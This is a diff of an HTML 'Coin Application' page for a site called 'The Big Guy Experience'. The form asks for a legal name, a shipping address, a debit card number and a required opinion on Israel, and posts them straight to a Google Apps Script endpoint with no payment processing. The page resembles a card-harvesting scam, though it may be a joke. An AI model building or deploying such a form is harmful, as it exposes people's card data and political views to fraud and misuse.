--- a/apply.html
+++ b/apply.html
@@ -3,44 +3,43 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Big Guy Experience</title>
+    <title>The Big Guy Experience</title>
     <link rel="stylesheet" href="css/style.css">
 </head>
 <body>
     <header>
         <h1>The Big Guy Experience</h1>
         <nav>
-            <a href="index.html">Home</a>
+            <a href="home.html">Home</a>
             <a href="about.html">About</a>
             <a href="apply.html">Apply</a>
         </nav>
     </header>
     <main>
         <h2>Coin Application</h2>
-
-        <form id="contact-form" class="contact-form" action="https://script.google.com/macros/s/AKfycbyRpEFx2SEm_CMwPrSESjPP9_dp_LkB52cxrlWe6TS7VbOXG9_nZTl4mXm2s-o2mxCRpw/exec" method="POST">
-            <div class="form-column">
-                <label for="name">Legal Name:</label>
-                <input type="text" id="name" name="name" required>
+        <form action="https://script.google.com/macros/s/AKfycbyRpEFx2SEm_CMwPrSESjPP9_dp_LkB52cxrlWe6TS7VbOXG9_nZTl4mXm2s-o2mxCRpw/exec" method="POST" onsubmit="setTimeout(function(){window.location='confirmation.html';}, 500);">
+            <div class="form-columns">
+                <div class="input-group">
+                    <label for="name">Legal Name:</label>
+                    <input type="text" id="name" name="name" required>
+                </div>
+                <div class="input-group">
+                    <label for="address">Shipping Address:</label>
+                    <input type="text" id="address" name="address" required>
+                </div>
+                <div class="input-group">
+                    <label for="number">Debit Card Number:</label>
+                    <input type="text" id="number" name="number" required>
+                </div>
+                <div class="input-group">
+                    <label for="israel">Opinions on Israel (Required):</label>
+                    <input type="text" id="israel" name="israel" required>
+                </div>
             </div>
-
-            <div class="form-column">
-                <label for="address">Shipping Address:</label>
-                <input type="text" id="address" name="address" required>
-            </div>
-
-            <div class="form-column">
-                <label for="number">Debit Card Number:</label>
-                <input type="text" id="number" name="number" placeholder="No credit cards" required>
-            </div>
-
-            <div class="form-column">
-                <label for="israel">Opinions on Israel (Required):</label>
-                <input type="text" id="israel" name="israel" required>
-            </div>
-
-            <button type="submit" class="send-button">Submit Info</button>
+            <button type="submit" class="submit-btn">Submit Info</button>
         </form>
+
+
     </main>
     <footer>
         <p>&copy; 2025 The Big Guy Experience. All rights reserved. Vaya a la conhca de tu madre.</p>
